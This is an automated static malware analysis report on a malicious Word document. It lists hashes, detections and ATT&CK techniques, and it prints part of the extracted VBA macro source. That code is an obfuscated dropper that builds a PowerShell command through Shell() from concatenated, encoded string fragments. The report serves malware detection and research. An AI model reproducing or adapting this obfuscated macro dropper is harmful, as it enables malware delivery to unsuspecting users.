Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 05a2e3eeb89767c8…

MALICIOUS

Office (OLE)

89.2 KB Created: 2018-06-20 07:57:00 Authoring application: Microsoft Office Word First seen: 2018-07-23
MD5: 6aa3e3c7c5f0139933628a1c53e89dc6 SHA-1: d30a5de93647bcae872c59536d3b04d08805a1aa SHA-256: 05a2e3eeb89767c84fb0e92c97bfaf7f0d28cec8e9a70286ec5082b59fbd37d4
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro uses the Shell() function to execute a PowerShell command. The command is constructed by concatenating multiple strings, including 'OwerSHell & ((vARiAbLE \'*mDR*\'').NAME[3,11,2]-jOIn \' \') ( \"$( SeT-VaRiable \'OfS\' \'\')$\" + [St'. This indicates the document is likely a spearphishing attachment designed to download and execute a secondary payload.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6584902-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6584902-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11710 bytes
SHA-256: 963f9f140957cae1602828551827c42577008db34f4bfb64d24da45c5fe08d51
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "rijHcrGiz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "ziLtmSwPswqr"
Function BoCFr()
On Error Resume Next
cQnzVI = CByte(wjcRFY)
raFUz = 24061
wjhVO = CDate(39275)
dEGMS = CDate(sWGhw + Sin(6690 + 10844) * 18613 * CInt(8890))
VNOkNp = 49756
tbYAhQ = KrFDQh
sWPKUEaQElX = "OwerSHell" + "  & ((vARiAb" + "lE '*mDR*')" + ".NAM" + "E[3,11,2]-jOI" + "n'') ( " + Chr(34) + "$( " + "SeT-VaR" + "iAble  'Of" + "S'  '')" + Chr(34) + "+[St"
BSIrC = CByte(tpTfNF)
mZGuD = 64734
VNBbpD = CDate(79124)
wlKsz = CDate(YUNFn + Sin(5992 + 84986) * 79140 * CInt(74451))
lDEnbd = 91099
ZfOzkl = mGkQqC
PVUviik = "RiNG]('11E7" + "6>77G121~" + "66>90>" + "76E" + "15N18r15K65N" + "74d88>2r64d77" + "~69~74d76K91~" + "15r93L78L65!" + "75!64" + "N6"
CDfaGC = CByte(prnMv)
mCEHMF = 11008
lMsiR = CDate(4259)
NwwlF = CDate(ZZjcPf + Sin(29461 + 24104) * 8468 * CInt(63497))
zFfVUG = 50017
PwIcjO = rlaOs
SorcI = "6K20N11>" + "64N107E99~109E6" + "7L15~18~1" + "5!65d74N88r2!"
jKjfIS = CByte(tqihr)
YLGYK = 65434
TVLhwp = CDate(24561)
HAwbpu = CDate(fsdAiK + Sin(10770 + 30758) * 64633 * CInt(25423))
VKdkGO = 45882
UhKRhX = ACoSD
HiQKGctJU = "64>77>69r74>" + "76~9" + "1G15d124E86d92" + "d91>74!66E1r97" + "~74L91r1!12" + "0K74E77d108d6"
BoCFr = sWPKUEaQElX + PVUviik + SorcI + HiQKGctJU
End Function
Function WRwBMT()
On Error Resume Next
IjNFdT = CByte(VfQqS)
JhGlj = 62209
NoszMo = CDate(38155)
XDhFzJ = CDate(wwvTj + Sin(81038 + 10103) * 32866 * CInt(78315))
SYjOw = 1713
ojrDfq = rGrdfl
MzJmXK = "7!70!" + "74G65" + "!9" + "1~2" + "0>11d96K123E9" + "8~93" + "G117r1" + "5K18K15d"
kHXDNX = CByte(cXrNz)
IUaNl = 2024
sRiQM = CDate(88421)
zjTkI = CDate(LYkiwV + Sin(20079 + 12098) * 42356 * CInt(67634))
dKGZjU = 44967
cYdDE = tThmls
zImjnr = "8K71N9" + "1d" + "91E95L2" + "1d0L0E31G24r" + "26r26>75N65~7" + "8N69!75K1K76K64" + "L66G0!2" + "5L" + "87d88>78N93L1"
roHWic = CByte(oQGvBa)
fWOvr = 74391
bzZfM = CDate(42696)
vzUUvT = CDate(uQWMpA + Sin(54209 + 84903) * 59920 * CInt(28093))
nvdMhr = 86686
wTjKG = zNVTjn
OrCUK = "25>74r77!92L0" + ">111d71" + "r91G91d95L21r0K" + "0!64K88L65L2L91" + "L93~"
LZpjSL = CByte(PCzkq)
jVQCtn = 16828
VhzMNd = CDate(39203)
SmjAsM = CDate(nLmLW + Sin(14124 + 76839) * 77112 * CInt(62544))
nJHtz = 70136
ObjQUQ = BIjGL
IRcYpYvuX = "78E65r92L" + "95N64>" + "93N91L1" + "d76G64~66E0r95d" + "90!77L0N119d72N" + "98N121d74L28!0" + "r111G71>91L91K"
WhtQc = CByte(BnQwVV)
ZFjOR = 73998
jjQbQG = CDate(80935)
FuAXB = CDate(dhndFl + Sin(62409 + 72361) * 98339 * CInt(24521))
ZwwcqL = 49357
SjTclu = njpRi
nvkNwXDkk = "95d21>0L0L88r88" + "L88L1r66L92G68>" + "95d93E64L74d" + "68K91N1r93!9" + "0>0>77N72E107"
kTwhD = CByte(wZWdTz)
PQiBiU = 68685
kSwMzn = CDate(8376)
BRTMTB = CDate(UuVIaC + Sin(5138 + 31266) * 83616 * CInt(69682))
taLYGc = 38919
TbfMkw = KIHNMH
NiUfH = "~73!123L1" + "26G104G" + "117E127K0" + "r111r" + "71r91G"
CGbUUc = CByte(ohVZJ)
srOuOn = 88399
lHiOTK = CDate(72454)
PMPvo = CDate(akcnN + Sin(58595 + 50835) * 9511 * CInt(11736))
FEbHKZ = 61824
mVnwuU = ualUz
DoCaDpHjq = "91r95E21L" + "0L0N88G8" + "8N88r1L" + "66G78K68" + "r22G" + "30>26K23~3" + "1>31N1N93!9" + "0L0>" + "106!106N12"
MiTjBw = CByte(wXpZvE)
MUlMu = 13044
UCCdr = CDate(69084)
zjMRMY = CDate(pjCqP + Sin(51508 + 66186) * 91629 * CInt(35911))
ZfGtD = 8088
vvQtqF = sprEdE
pbRTGpYnV = "4!127L12" + "6~30d25E22K8" + "7>105K0" + "G11" + "1G71K91~9" + "1E95~21!0K0" + "N88~88>88~1N6" + "8~" + "90d91K74~92~"
fdmZjO = CByte(wSDJiX)
wPAFj = 77626
WjJMb = CDate(73582)
voVALY = CDate(VCkzS + Sin(9718 + 24806) * 24115 * CInt(10347))
pZOIr = 74874
tqiPBi = PjpTt
HZKGE = "71L64d95K1d" + "68N70G74K65E" + "77N70d74!65~91" + "!74~" + "76d71G1K" + "76r64E66N" + "0L22K1" + "05r" + "30r23G110~" + "22"
WRwBMT = MzJmXK + zImjnr + OrCUK + IRcYpYvuX + nvkNwXDkk + NiUfH + Do
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.